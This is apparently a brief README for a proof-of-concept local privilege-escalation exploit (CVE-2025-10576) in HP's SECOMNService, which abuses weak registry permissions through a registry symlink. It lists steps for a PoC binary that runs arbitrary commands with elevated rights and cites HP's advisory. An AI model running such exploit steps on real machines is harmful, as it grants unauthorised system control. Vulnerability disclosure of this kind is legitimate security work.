HP Sound Research SECOMNService Escalation of Privilege
# CVE-2025-10576
HP Sound Research SECOMNService Escalation of Privilege. Weak registry permissions allows any user to create a registry symlink and force the SECOMNService service to create an arbitrary registry key.
**How to:**
1. soundresearch_poc.exe prepare
2. Restart SECOMNService or the machine
3. soundresearch_poc.exe exploit "whoami /all > C:\Windows\soundresearch.txt"
4. soundresearch_poc.exe exploit "*another command*"
5. soundresearch_poc.exe cleanup
Reference: https://support.hp.com/us-en/document/ish_13092608-13092602-16/hpsbhf04051
登录后查看神龙缓存的 POC 文件快照
登录查看